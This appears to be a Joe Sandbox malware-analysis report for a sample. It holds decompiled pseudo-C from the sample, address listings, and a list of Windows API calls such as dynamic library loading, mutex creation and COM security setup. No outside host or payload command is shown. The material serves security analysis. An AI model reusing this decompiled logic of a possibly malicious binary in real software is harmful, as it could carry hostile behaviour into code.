							 *(_t466 - 0x14) = _t333;
							 *(_t466 - 0x10) = _t333;
							 *(_t466 - 0x3c) = _t333;
							 *(_t466 - 0x38) = _t333;
							 *(_t466 - 0x44) = _t333;
							 *(_t466 - 0x40) = _t333;
							 *((intOrPtr*)( *( *0x3e8628)))(_t333, _t333, E003E08A0, _t466 - 0x5c0, _t333, _t466 - 0x74);
							 *(_t466 - 0x24) = _t333;
							while(1) {
								_t249 =  *(_t466 - 0x5b8);
								_t369 = 0;
								 *0x3e857c = 0;
								 *(_t466 - 0x20) = _t333;
								__eflags =  *((intOrPtr*)(_t249 + 0x18)) - _t333;
								if(__eflags <= 0) {
									goto L85;
								}
								do {
									_t434 =  *( *((intOrPtr*)(_t249 + 0x20)) + _t369 * 4);
									_t255 = L003C94D0(_t466 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t249 + 0x1c)) + _t369 * 4)), _t434);
									__eflags = _t255;
									if(_t255 != 0) {
										__imp___time64(_t333);
										_t459 = _t434;
										_t435 =  *0x3e857c; // 0x0
										_t473 = _t468 + 4;
										_t465 = _t255;
										_t256 = _t255 -  *((intOrPtr*)( *((intOrPtr*)( *(_t466 - 0x5b8) + 0x24)) + _t435 * 8));
										__eflags = _t256;
										asm("sbb ebx, [ecx+edx*8+0x4]");
										 *(_t466 - 0x48) = _t459;
										if(__eflags < 0) {
											L33:
											_t333 = 0;
											_t258 = E003D1B80(_t465, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x28);
											_t468 = _t473 + 0xc;
											__eflags = _t258;
											if(_t258 == 0) {
												 *(_t466 - 0x20) =  *(_t466 - 0x20) + 1;
												 *( *((intOrPtr*)(_t466 - 0x5bc)) + 0xc) =  *(_t466 - 0x28);
												_t261 = _t465 -  *(_t466 - 0x3c);
												__eflags = _t261;
												asm("sbb edx, [ebp-0x38]");
												 *(_t466 - 0x48) = _t459;
												if(__eflags < 0) {
													L42:
													E003C42A0(__eflags, _t466 - 0x5c0);
													_t474 = _t468 + 4;
													_t263 = E003D12C0();
													_push(4);
													__eflags = _t263 - _t333;
													if(__eflags >= 0) {
														if(__eflags != 0) {
															_push(_t466 - 0x9c0);
															E003C9090(__eflags);
															E003C9090(__eflags, _t466 - 0xdc0, 7);
															_push(_t466 - 0xdc0);
															_push(_t466 - 0x9c0);
															_push(0xe);
															_t440 = _t466 - 0x5c0;
															_push(_t440);
														} else {
															_push(_t466 - 0x9c0);
															E003C9090(__eflags);
															E003C9090(__eflags, _t466 - 0xdc0, 6);
															_push(_t466 - 0xdc0);
															_t440 = _t466 - 0x9c0;
															_push(_t440);
															_push(0xe);
															_push(_t466 - 0x5c0);
														}
													} else {
														_push(_t466 - 0x9c0);
														E003C9090(__eflags);
														E003C9090(__eflags, _t466 - 0xdc0, 5);
														_t440 = _t466 - 0xdc0;
														_push(_t440);
														_push(_t466 - 0x9c0);
														_push(0xe);
														_push(_t466 - 0x5c0);
													}
													_t267 = E003C5A10();
													_t475 = _t474 + 0x20;
													 *(_t466 - 0x48) = _t333;
													do {
														__imp___time64(0);
														_t465 = _t267;
														_t268 =  *0x3e8570; // 0x0
														_t468 = _t475 + 4;
														_t459 = _t440;
														__eflags = _t268 - 2;
														if(_t268 == 2) {
															L52:
															_t270 = E003C36E0(_t459, _t465, _t466 - 0xc, _t466 - 0x5c0,  *(_t466 - 0x14),  *(_t466 - 0x10));
															_t468 = _t468 + 0x10;
															asm("sbb edx, 0x0");
															 *(_t466 - 0x14) = _t465 - 0x708;
															 *(_t466 - 0x10) = _t459;
															__eflags = _t270 - 1;
															if(_t270 == 1) {
																 *0x3e85ac = _t270;
															}
															L54:
															_t272 = _t465 -  *(_t466 - 0x44);
															__eflags = _t272;
															asm("sbb ecx, [ebp-0x40]");
															 *(_t466 - 0x5c) = _t459;
															if(__eflags < 0) {
																L61:
																_t465 = _t465 -  *(_t466 - 0x30);
																__eflags = _t465;
																asm("sbb edi, [ebp-0x2c]");
																 *(_t466 - 0x5c) = _t459;
																if(__eflags < 0) {
																	L68:
																	_t273 = E003C9890( *((intOrPtr*)(_t466 - 0x5bc)));
																	__eflags = _t273;
																	if(_t273 == 0) {
																		L83:
																		_t333 = 0;
																		__eflags = 0;
																		goto L84;
																	}
																	_push(1);
																	_push(_t466 - 0x5c0);
																	_t274 = E003C5A10();
																	_t468 = _t468 + 8;
																	__eflags = _t274;
																	if(__eflags == 0) {
																		goto L83;
																	}
																	_t440 = _t466 - 0x5c0;
																	_t275 = E003C7560(_t333, __eflags, _t440);
																	_t468 = _t468 + 4;
																	__eflags = _t275;
																	if(_t275 == 0) {
																		__eflags =  *0x3e85ac;
																		if( *0x3e85ac != 0) {
																			L88:
																			E003C1700(_t466 - 0xc);
																			E003CF850(_t333, _t466 - 0x5c0);
																			E003CC930(_t466 - 4);
																			_t333 = 0;
																			__eflags = 0;
																			goto L89;
																		}
																		goto L83;
																	}
																	__eflags =  *0x3e85ac;
																	if( *0x3e85ac != 0) {
																		goto L88;
																	}
																	_t279 =  *0x3e8584; // 0x0
																	_t465 = 0xa;
																	__eflags = _t279;
																	if(_t279 == 0) {
																		_t280 =  *(_t466 - 0x24);
																		__eflags = _t280;
																		if(_t280 <= 0) {
																			while(1) {
																				L76:
																				_t390 =  *0x3e8584; // 0x0
																				__eflags = _t390;
																				if(_t390 != 0) {
																					goto L78;
																				}
																				_t440 =  *0x3e8628; // 0x622508
																				 *((intOrPtr*)( *((intOrPtr*)(_t440 + 0xc8))))(0x4e20);
																				_t465 = _t465 - 1;
																				__eflags = _t465;
																				if(_t465 > 0) {
																					continue;
																				}
																				goto L78;
																			}
																			goto L78;
																		}
																		L75:
																		_t284 = _t280 - 1;
																		__eflags = _t284;
																		 *(_t466 - 0x24) = _t284;
																		_t465 = 1;
																		goto L76;
																	}
																	_t158 = _t465 - 5; // 0x5
																	_t280 = _t158;
																	 *0x3e8584 = 0;
																	goto L75;
																}
																if(__eflags > 0) {
																	L64:
																	_t465 = E003CF2D0(_t466 - 0x5c0);
																	_t286 = E003C99A0(_t333, _t466 - 0x19, _t459, _t285, _t285);
																	_push(8);
																	__eflags = _t286;
																	if(__eflags == 0) {
																		_push(_t466 - 0x9c0);
																		E003C9090(__eflags);
																		E003C9090(__eflags, _t466 - 0xdc0, 0xa);
																		_push(_t466 - 0xdc0);
																		_t446 = _t466 - 0x9c0;
																		_push(_t446);
																		_push(0xe);
																		_push(_t466 - 0x5c0);
																	} else {
																		_push(_t466 - 0x9c0);
																		E003C9090(__eflags);
																		E003C9090(__eflags, _t466 - 0xdc0, 9);
																		_t446 = _t466 - 0xdc0;
																		_push(_t446);
																		_push(_t466 - 0x9c0);
																		_push(0xe);
																		_push(_t466 - 0x5c0);
																	}
																	E003C5A10();
																	_t292 = E003CBB40(_t465);
																	__imp___time64(0);
																	_t468 = _t468 + 0x28;
																	 *(_t466 - 0x30) = _t292;
																	 *(_t466 - 0x2c) = _t446;
																	goto L68;
																}
																__eflags = _t465 - 0x7080;
																if(_t465 <= 0x7080) {
																	goto L68;
																}
																goto L64;
															}
															if(__eflags > 0) {
																L57:
																_t448 =  *0x3e857c; // 0x0
																_t298 = _t465 -  *((intOrPtr*)( *((intOrPtr*)( *(_t466 - 0x5b8) + 0x28)) + _t448 * 8));
																__eflags = _t298;
																_t333 = _t459;
																asm("sbb ebx, [ecx+edx*8+0x4]");
																 *(_t466 - 0x5c) = _t459;
																if(__eflags < 0) {
																	goto L61;
																}
																if(__eflags > 0) {
																	L60:
																	 *(_t466 - 0x44) = _t465;
																	 *(_t466 - 0x40) = _t459;
																	_t300 = E003C1FE0(_t333, _t459, _t465, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x5b8);
																	_t468 = _t468 + 0xc;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		_t301 = E003D0AD0(_t466 - 0x5c0,  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x14)));
																		__eflags = _t301;
																		if(_t301 == 0) {
																			goto L88;
																		}
																		 *0x3e857c = 0;
																		goto L83;
																	}
																	goto L61;
																}
																__eflags = _t298 - 0x3840;
																if(_t298 <= 0x3840) {
																	goto L61;
																}
																goto L60;
															}
															__eflags = _t272 - 0x4b0;
															if(_t272 <= 0x4b0) {
																goto L61;
															}
															goto L57;
														}
														_t303 = _t465 -  *(_t466 - 0x14);
														__eflags = _t303;
														asm("sbb ecx, [ebp-0x10]");
														 *(_t466 - 0x5c) = _t459;
														if(__eflags < 0) {
															goto L54;
														}
														if(__eflags > 0) {
															goto L52;
														}
														__eflags = _t303 - 0xe10;
														if(_t303 <= 0xe10) {
															goto L54;
														}
														goto L52;
														L78:
														_t267 =  *(_t466 - 0x48) + 1;
														 *(_t466 - 0x48) = _t267;
														__eflags = _t267 - 0x64;
													} while (_t267 < 0x64);
													goto L83;
												}
												if(__eflags > 0) {
													L40:
													_t313 = E003CAC90( *(_t466 - 0x5b8), _t466 - 0x5c0);
													_t468 = _t468 + 8;
													__eflags = _t313;
													if(__eflags == 0) {
														goto L84;
													}
													 *(_t466 - 0x3c) = _t465;
													 *(_t466 - 0x38) = _t459;
													goto L42;
												}
												__eflags = _t261 - 0xe10;
												if(__eflags <= 0) {
													goto L42;
												}
												goto L40;
											}
											__eflags = _t258 - 1;
											if(_t258 != 1) {
												E003CC870(_t466 - 0x5c0, _t258);
												_t468 = _t468 + 8;
											}
											_t405 =  *0x3e8628; // 0x622508
											 *((intOrPtr*)( *((intOrPtr*)(_t405 + 0xc8))))(0x3e8);
											goto L84;
										}
										if(__eflags > 0) {
											L28:
											_t318 = E003CD890(_t465, __eflags, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x58);
											_t473 = _t473 + 0xc;
											__eflags = _t318;
											if(_t318 == 0) {
												_t319 =  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x24));
												_t407 =  *0x3e857c; // 0x0
												 *(_t319 + _t407 * 8) = _t465;
												_t455 =  *0x3e857c; // 0x0
												 *(_t319 + 4 + _t455 * 8) = _t459;
												goto L33;
											}
											__eflags = _t318 - 1;
											if(_t318 != 1) {
												E003CC870(_t466 - 0x5c0, _t318);
												_t468 = _t473 + 8;
											}
											_t320 =  *0x3e8628; // 0x622508
											 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc8))))(0x3e8);
											goto L83;
										}
										__eflags = _t256 - 0x3840;
										if(__eflags <= 0) {
											goto L33;
										}
										goto L28;
									}
									_t457 =  *0x3e8628; // 0x622508
									 *((intOrPtr*)( *((intOrPtr*)(_t457 + 0xc8))))(0x3e8);
									L84:
									_t385 =  *0x3e857c; // 0x0
									_t249 =  *(_t466 - 0x5b8);
									_t369 = _t385 + 1;
									 *0x3e857c = _t369;
									__eflags = _t369 -  *((intOrPtr*)(_t249 + 0x18));
								} while (__eflags < 0);
								L85:
								_t251 = E003E0A40(_t459, _t465, __eflags, _t466 - 0xc, _t466 - 0x5b8);
								_t468 = _t468 + 8;
								__eflags = _t251;
								if(_t251 == 0) {
									__eflags =  *(_t466 - 0x20) - _t333;
									if(__eflags == 0) {
										L003E0D30(_t333, _t459, _t465, __eflags, _t466 - 0xc, _t466 - 0x5c0);
										_t468 = _t468 + 8;
									}
								}
							}
						} else {
							L18:
							E003C1700(_t466 - 0xc);
							E003CF850(_t333, _t466 - 0x5c0);
							E003CC930(_t466 - 4);
							goto L89;
						}
					} else {
						E003CC930(_t466 - 4);
						goto L89;
					}
				} else {
					E003E0BB0(_t333, _t479);
					E003CC930(_t466 - 4);
					goto L89;
				}
			}














































































    0x003cfc20
    0x003cfc20
    0x003cfc2d
    0x003cfc32
    0x003cfc40
    0x003cfc43
    0x003cfc47
    0x003cfc58
    0x003cfc5e
    0x003cfc64
    0x003cfc6a
    0x003cfc77
    0x003cfc79
    0x003cfc8b
    0x003cfc8d
    0x003cfc9f
    0x003cfcb3
    0x003cfcb5
    0x003cfcc4
    0x003cfcca
    0x003cfccd
    0x003cfcd2
    0x003cfcd7
    0x003cfcd9
    0x003d03e9
    0x003d03e9
    0x003d03ef
    0x003d04eb
    0x003d04eb
    0x003d04f0
    0x003d04f6
    0x003d04f6
    0x003d03f5
    0x003d03fb
    0x003d0403
    0x003d0406
    0x003d0409
    0x003d040c
    0x003d040f
    0x003d0412
    0x003d0423
    0x003d0429
    0x003d0434
    0x003d0439
    0x003d0440
    0x003d0495
    0x003d049c
    0x003d04b7
    0x003d04bc
    0x003d04c9
    0x003d04ce
    0x003d04db
    0x003d04e1
    0x003d04e9
    0x00000000
    0x003d04e9
    0x003d0442
    0x003d0445
    0x003d044a
    0x003d0450
    0x003d0450
    0x003d0458
    0x00000000
    0x00000000
    0x003d045a
    0x003d0460
    0x00000000
    0x00000000
    0x003d0462
    0x003d0465
    0x003d0468
    0x003d046b
    0x003d046c
    0x00000000
    0x00000000
    0x003d0474
    0x003d0474
    0x003d0477
    0x003d047c
    0x003d047e
    0x003d0483
    0x003d0485
    0x003d0491
    0x003d0491
    0x003d0493
    0x00000000
    0x003d0493
    0x003d0470
    0x003d0472
    0x00000000
    0x00000000
    0x00000000
    0x003d0472
    0x003cfce2
    0x003cfce7
    0x003cfce9
    0x003cfd01
    0x003cfd04
    0x003cfd0b
    0x003cfd11
    0x003cfd13
    0x003cfd20
    0x003cfd25
    0x003cfd25
    0x003cfd28
    0x003cfd2d
    0x003cfd2f
    0x003cfd34
    0x003cfd39
    0x003cfd3c
    0x003cfd3e
    0x003cfd4b
    0x003cfd4b
    0x003cfd40
    0x003cfd47
    0x003cfd47
    0x003cfd4f
    0x003cfd54
    0x003cfd56
    0x003cfd65
    0x003cfd67
    0x003cfd6b
    0x003cfd70
    0x003cfd71
    0x003cfd76
    0x003cfd76
    0x003cfd79
    0x003cfd7f
    0x003cfd8a
    0x003cfd90
    0x003cfd96
    0x003cfda7
    0x003cfdaf
    0x003cfdb7
    0x003cfdbc
    0x003cfdbe
    0x003cfdc1
    0x003cfdc4
    0x003cfdc9
    0x003cfdcc
    0x003cfdce
    0x003cfddf
    0x003cfdd0
    0x003cfdd7
    0x003cfdd7
    0x003cfdee
    0x003cfe05
    0x003cfe18
    0x003cfe28
    0x003cfe2d
    0x003cfe30
    0x003cfe32
    0x003cfe5d
    0x003cfe72
    0x003cfe74
    0x00000000
    0x00000000
    0x003cfe7c
    0x003cfe99
    0x003cfea2
    0x003cfea5
    0x003cfea8
    0x003cfeab
    0x003cfeae
    0x003cfeb1
    0x003cfeb4
    0x003cfeb7
    0x003cfeba
    0x003cfebc
    0x003cfec0
    0x003cfec0
    0x003cfec6
    0x003cfec8
    0x003cfece
    0x003cfed1
    0x003cfed4
    0x00000000
    0x00000000
    0x003cfee0
    0x003cfee3
    0x003cfef4
    0x003cfef9
    0x003cfefb
    0x003cff16
    0x003cff25
    0x003cff27
    0x003cff2d
    0x003cff30
    0x003cff32
    0x003cff32
    0x003cff37
    0x003cff3b
    0x003cff3e
    0x003cffac
    0x003cffbb
    0x003cffbd
    0x003cffc2
    0x003cffc5
    0x003cffc7
    0x003cffff
    0x003d0002
    0x003d0007
    0x003d0007
    0x003d000c
    0x003d000f
    0x003d0012
    0x003d0041
    0x003d0048
    0x003d004d
    0x003d0053
    0x003d0058
    0x003d005a
    0x003d005c
    0x003d0091
    0x003d00cc
    0x003d00cd
    0x003d00db
    0x003d00e6
    0x003d00ed
    0x003d00ee
    0x003d00f0
    0x003d00f6
    0x003d0093
    0x003d0099
    0x003d009a
    0x003d00a8
    0x003d00b3
    0x003d00b4
    0x003d00ba
    0x003d00bb
    0x003d00c3
    0x003d00c3
    0x003d005e
    0x003d0064
    0x003d0065
    0x003d0073
    0x003d0078
    0x003d007e
    0x003d0085
    0x003d0086
    0x003d008e
    0x003d008e
    0x003d00f7
    0x003d00fc
    0x003d00ff
    0x003d0102
    0x003d0104
    0x003d010a
    0x003d010c
    0x003d0111
    0x003d0114
    0x003d0116
    0x003d0119
    0x003d0133
    0x003d0146
    0x003d014b
    0x003d0158
    0x003d015b
    0x003d015e
    0x003d0161
    0x003d0164
    0x003d0166
    0x003d0166
    0x003d016b
    0x003d016d
    0x003d016d
    0x003d0172
    0x003d0175
    0x003d0178
    0x003d01d3
    0x003d01d3
    0x003d01d3
    0x003d01d6
    0x003d01d9
    0x003d01dc
    0x003d028f
    0x003d0295
    0x003d029a
    0x003d029c
    0x003d0372
    0x003d0372
    0x003d0372
    0x00000000
    0x003d0372
    0x003d02a8
    0x003d02aa
    0x003d02ab
    0x003d02b0
    0x003d02b3
    0x003d02b5
    0x00000000
    0x00000000
    0x003d02bb
    0x003d02c2
    0x003d02c7
    0x003d02ca
    0x003d02cc
    0x003d0369
    0x003d0370
    0x003d03cc
    0x003d03cf
    0x003d03da
    0x003d03e2
    0x003d03e7
    0x003d03e7
    0x00000000
    0x003d03e7
    0x00000000
    0x003d0370
    0x003d02d2
    0x003d02d9
    0x00000000
    0x00000000
    0x003d02df
    0x003d02e4
    0x003d02e9
    0x003d02eb
    0x003d02fc
    0x003d02ff
    0x003d0301
    0x003d0310
    0x003d0310
    0x003d0310
    0x003d0316
    0x003d0318
    0x00000000
    0x00000000
    0x003d031a
    0x003d032b
    0x003d032d
    0x003d032e
    0x003d0330
    0x00000000
    0x00000000
    0x00000000
    0x003d0330
    0x00000000
    0x003d0310
    0x003d0303
    0x003d0303
    0x003d0303
    0x003d0304
    0x003d0307
    0x00000000
    0x003d0307
    0x003d02ed
    0x003d02ed
    0x003d02f0
    0x00000000
    0x003d02f0
    0x003d01e2
    0x003d01f0
    0x003d01fb
    0x003d0201
    0x003d0206
    0x003d0208
    0x003d020a
    0x003d0245
    0x003d0246
    0x003d0254
    0x003d025f
    0x003d0260
    0x003d0266
    0x003d0267
    0x003d026f
    0x003d020c
    0x003d0212
    0x003d0213
    0x003d0221
    0x003d0226
    0x003d022c
    0x003d0233
    0x003d0234
    0x003d023c
    0x003d023c
    0x003d0270
    0x003d0279
    0x003d0280
    0x003d0286
    0x003d0289
    0x003d028c
    0x00000000
    0x003d028c
    0x003d01e4
    0x003d01ea
    0x00000000
    0x00000000
    0x00000000
    0x003d01ea
    0x003d017a
    0x003d0183
    0x003d018c
    0x003d0194
    0x003d0194
    0x003d0197
    0x003d0199
    0x003d019d
    0x003d01a0
    0x00000000
    0x00000000
    0x003d01a2
    0x003d01ab
    0x003d01bd
    0x003d01c0
    0x003d01c3
    0x003d01c8
    0x003d01cb
    0x003d01cd
    0x003d0354
    0x003d0359
    0x003d035b
    0x00000000
    0x00000000
    0x003d035d
    0x00000000
    0x003d035d
    0x00000000
    0x003d01cd
    0x003d01a4
    0x003d01a9
    0x00000000
    0x00000000
    0x00000000
    0x003d01a9
    0x003d017c
    0x003d0181
    0x00000000
    0x00000000
    0x00000000
    0x003d0181
    0x003d011d
    0x003d011d
    0x003d0122
    0x003d0125
    0x003d0128
    0x00000000
    0x00000000
    0x003d012a
    0x00000000
    0x00000000
    0x003d012c
    0x003d0131
    0x00000000
    0x00000000
    0x00000000
    0x003d0332
    0x003d0335
    0x003d0336
    0x003d0339
    0x003d0339
    0x00000000
    0x003d0342
    0x003d0014
    0x003d001d
    0x003d002b
    0x003d0030
    0x003d0033
    0x003d0035
    0x00000000
    0x00000000
    0x003d003b
    0x003d003e
    0x00000000
    0x003d003e
    0x003d0016
    0x003d001b
    0x00000000
    0x00000000
    0x00000000
    0x003d001b
    0x003cffc9
    0x003cffcc
    0x003cffd6
    0x003cffdb
    0x003cffdb
    0x003cffde
    0x003cffef
    0x00000000
    0x003cffef
    0x003cff40
    0x003cff49
    0x003cff58
    0x003cff5d
    0x003cff60
    0x003cff62
    0x003cff96
    0x003cff99
    0x003cff9f
    0x003cffa2
    0x003cffa8
    0x00000000
    0x003cffa8
    0x003cff64
    0x003cff67
    0x003cff71
    0x003cff76
    0x003cff76
    0x003cff79
    0x003cff89
    0x00000000
    0x003cff89
    0x003cff42
    0x003cff47
    0x00000000
    0x00000000
    0x00000000
    0x003cff47
    0x003cfefd
    0x003cff0e
    0x003d0374
    0x003d0374
    0x003d037a
    0x003d0380
    0x003d0381
    0x003d0387
    0x003d0387
    0x003d0390
    0x003d039b
    0x003d03a0
    0x003d03a3
    0x003d03a5
    0x003d03ab
    0x003d03ae
    0x003d03bf
    0x003d03c4
    0x003d03c4
    0x003d03ae
    0x003d03a5
    0x003cfe34
    0x003cfe34
    0x003cfe37
    0x003cfe42
    0x003cfe4a
    0x00000000
    0x003cfe4a
    0x003cfd58
    0x003cfd5b
    0x00000000
    0x003cfd5b
    0x003cfceb
    0x003cfceb
    0x003cfcf3
    0x00000000
    0x003cfcf3

    APIs
    • Sleep.KERNELBASE(00000001), ref: 003CFC40
    • SetCurrentDirectoryW.KERNELBASE(?), ref: 003CFCB3
    • srand.MSVCRT ref: 003CFCC4
      • Part of subcall function 003CEB30: LoadLibraryW.KERNEL32(?), ref: 003CEB82
      • Part of subcall function 003CEB30: LoadLibraryW.KERNEL32(?), ref: 003CEBA9
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEBD7
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEBFF
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEC27
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEC4F
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEC77
      • Part of subcall function 003CBAF0: CoInitializeEx.OLE32(00000000,00000000), ref: 003CBAF4
      • Part of subcall function 003CBAF0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 003CBB13
    • ExitProcess.KERNEL32 ref: 003D04F6
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003C3500: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,003E8C3C,000003E7), ref: 003C3542
      • Part of subcall function 003C3500: CreateMutexW.KERNELBASE(?,00000001,?), ref: 003C358B
      • Part of subcall function 003C3500: ExitProcess.KERNEL32 ref: 003C35AE
      • Part of subcall function 003E0BB0: ??2@YAPAXI@Z.MSVCRT ref: 003E0C80
      • Part of subcall function 003E0BB0: ??3@YAXPAX@Z.MSVCRT ref: 003E0D1D
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C9480: FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CFD69, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150

    Control-flow Graph

    C-Code - Quality: 52%
    			E003CFD69() {
				void* _t181;
				void* _t188;
				signed int* _t198;
				int _t207;
				int _t212;
				int _t214;
				int _t218;
				int _t219;
				int _t221;
				int _t224;
				void* _t226;
				int _t230;
				int _t231;
				int _t233;
				int _t235;
				int _t236;
				int _t237;
				int _t238;
				int _t242;
				int _t243;
				int _t247;
				int _t249;
				int _t255;
				int _t261;
				int _t263;
				int _t264;
				int _t266;
				int _t276;
				int _t281;
				intOrPtr _t282;
				int _t283;
				signed int* _t290;
				int _t293;
				signed int _t313;
				signed int _t316;
				signed int _t332;
				int _t337;
				int _t352;
				signed int _t354;
				int _t361;
				int _t363;
				int _t364;
				int _t365;
				signed short* _t366;
				int _t371;
				signed int _t372;
				int _t377;
				int _t383;
				signed int _t385;
				signed int _t392;
				int _t394;
				int _t395;
				void* _t396;
				void* _t398;
				int _t399;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t405;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				void* _t415;

				E003C2420(_t397);
				L003C1CB0();
				_t402 = _t401 + 4;
				_t293 =  *0x3e8628; // 0x622508
				 *0x3e8570 = _t289;
				 *0x3e8584 = _t289;
				 *0x3e8574 = _t289;
				 *0x3e8578 = _t289;
				 *((intOrPtr*)( *((intOrPtr*)(_t293 + 0xcc))))(0x3e8594, 0x800, _t397);
				E003C1B20(_t400 - 0x5c0,  *((intOrPtr*)(_t293 + 0xcc)), _t412);
				_t181 = E003CBB30(_t400 - 0xc);
				_push(0x34);
				 *(_t400 - 0x58) = _t289;
				 *(_t400 - 0x28) = _t289;
				L003CA47E();
				_t403 = _t402 + 4;
				_t413 = _t181 - _t289;
				if(_t181 == _t289) {
					 *(_t400 - 0x5b8) = _t289;
				} else {
					 *(_t400 - 0x5b8) = E003C70B0(_t181);
				}
				E003C9090(_t413, _t400 - 0x9c0, 3);
				E003CF550(_t400 - 0x50, _t289, _t400 - 0x9c0, 0xa, _t400 - 0x54, _t400 - 0x50);
				E003C1F00(_t400 - 0xc,  *((intOrPtr*)(_t400 - 0x54)),  *((intOrPtr*)(_t400 - 0x50)));
				_t188 = E003C69F0(_t400 - 0x5b8, _t400 - 0xc, _t400 - 0x5b8);
				_t405 = _t403 + 0x24;
				if(_t188 != 0) {
					 *(_t400 - 0x5c0) = _t400 - 0xc;
					__eflags = E003D0AD0(_t400 - 0x5c0,  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x14)));
					if(__eflags == 0) {
						goto L5;
					} else {
						E003C5700( *((intOrPtr*)(_t400 - 0x5bc)), __eflags);
						 *0x3e85ac = _t289;
						 *(_t400 - 0x30) = _t289;
						 *(_t400 - 0x2c) = _t289;
						 *(_t400 - 0x14) = _t289;
						 *(_t400 - 0x10) = _t289;
						 *(_t400 - 0x3c) = _t289;
						 *(_t400 - 0x38) = _t289;
						 *(_t400 - 0x44) = _t289;
						 *(_t400 - 0x40) = _t289;
						 *((intOrPtr*)( *( *0x3e8628)))(_t289, _t289, E003E08A0, _t400 - 0x5c0, _t289, _t400 - 0x74);
						 *(_t400 - 0x24) = _t289;
						while(1) {
							_t212 =  *(_t400 - 0x5b8);
							_t316 = 0;
							 *0x3e857c = 0;
							 *(_t400 - 0x20) = _t289;
							__eflags =  *((intOrPtr*)(_t212 + 0x18)) - _t289;
							if(__eflags <= 0) {
								goto L72;
							}
							do {
								_t371 =  *( *((intOrPtr*)(_t212 + 0x20)) + _t316 * 4);
								_t218 = L003C94D0(_t400 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x1c)) + _t316 * 4)), _t371);
								__eflags = _t218;
								if(_t218 != 0) {
									__imp___time64(_t289);
									_t395 = _t371;
									_t372 =  *0x3e857c; // 0x0
									_t408 = _t405 + 4;
									_t397 = _t218;
									_t219 = _t218 -  *((intOrPtr*)( *((intOrPtr*)( *(_t400 - 0x5b8) + 0x24)) + _t372 * 8));
									__eflags = _t219;
									asm("sbb ebx, [ecx+edx*8+0x4]");
									 *(_t400 - 0x48) = _t395;
									if(__eflags < 0) {
										L20:
										_t289 = 0;
										_t221 = E003D1B80(_t397, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x28);
										_t405 = _t408 + 0xc;
										__eflags = _t221;
										if(_t221 == 0) {
											 *(_t400 - 0x20) =  *(_t400 - 0x20) + 1;
											 *( *((intOrPtr*)(_t400 - 0x5bc)) + 0xc) =  *(_t400 - 0x28);
											_t224 = _t397 -  *(_t400 - 0x3c);
											__eflags = _t224;
											asm("sbb edx, [ebp-0x38]");
											 *(_t400 - 0x48) = _t395;
											if(__eflags < 0) {
												L29:
												E003C42A0(__eflags, _t400 - 0x5c0);
												_t409 = _t405 + 4;
												_t226 = E003D12C0();
												_push(4);
												__eflags = _t226 - _t289;
												if(__eflags >= 0) {
													if(__eflags != 0) {
														_push(_t400 - 0x9c0);
														E003C9090(__eflags);
														E003C9090(__eflags, _t400 - 0xdc0, 7);
														_push(_t400 - 0xdc0);
														_push(_t400 - 0x9c0);
														_push(0xe);
														_t377 = _t400 - 0x5c0;
														_push(_t377);
													} else {
														_push(_t400 - 0x9c0);
														E003C9090(__eflags);
														E003C9090(__eflags, _t400 - 0xdc0, 6);
														_push(_t400 - 0xdc0);
														_t377 = _t400 - 0x9c0;
														_push(_t377);
														_push(0xe);
														_push(_t400 - 0x5c0);
													}
												} else {
													_push(_t400 - 0x9c0);
													E003C9090(__eflags);
													E003C9090(__eflags, _t400 - 0xdc0, 5);
													_t377 = _t400 - 0xdc0;
													_push(_t377);
													_push(_t400 - 0x9c0);
													_push(0xe);
													_push(_t400 - 0x5c0);
												}
												_t230 = E003C5A10();
												_t410 = _t409 + 0x20;
												 *(_t400 - 0x48) = _t289;
												do {
													__imp___time64(0);
													_t397 = _t230;
													_t231 =  *0x3e8570; // 0x0
													_t405 = _t410 + 4;
